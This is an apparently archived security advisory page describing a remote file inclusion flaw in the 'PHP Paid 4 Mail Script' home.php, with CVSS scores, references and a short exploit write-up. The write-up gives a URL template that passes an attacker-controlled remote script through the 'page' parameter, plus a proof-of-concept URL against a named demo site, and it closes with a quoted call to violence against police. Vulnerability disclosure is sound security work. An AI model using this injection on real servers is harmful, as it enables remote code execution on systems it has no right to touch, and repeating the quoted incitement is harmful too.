PHP Paid 4 Mail Script (home.php page) Remote File Inclusion Vulnerability

2009.08.17
Credit: int_main();
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

_______ ___________ \ _ \ ___ __\_ _____/ / /_\ \\ \/ /| __) \ \_/ \> < | \ \_____ /__/\_ \\___ / \/ \/ \/ #ruling the web since 9/2008 [=] PHP Paid 4 Mail Script File Inclusion vuln Vendor : http://www.shop-020.de Script : PHP Paid 4 Mail Script Download : http://www.shop-020.de/phpscriptat-p25h4s5-PHP-Paid-4-Mail-Scri.html Author : int_main(); Contact : someone[at]jabber.ccc.de Site : 0xFEE1DEAD.de Greez : BrainWash,Thunderbird,STEAL,The Papst,eddy14,MagicFridge,Patrick B,Hero,tmh,Lorenz,iNs Exploit: http://[target]/home.php?page=[evilscript] POC: http://www.city-demo.at/mail/home.php?page=http://google.de (File access is unfortunately disabled in this case, otherwise, this inclusion would work because of the coding gap.) Have phun, wui! [=] "Wir sagen nat&#195;&#188;rlich, die Bullen sind Schweine, wir sagen, der Typ in Uniform ist ein Schwein, das ist kein Mensch, (...) und nat&#195;&#188;rlich kann geschossen werden!" (Ulrike Meinhof, 1970)" [=]

References:

http://xforce.iss.net/xforce/xfdb/52015
http://www.milw0rm.com/exploits/9269
http://secunia.com/advisories/35972
http://osvdb.org/56573


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top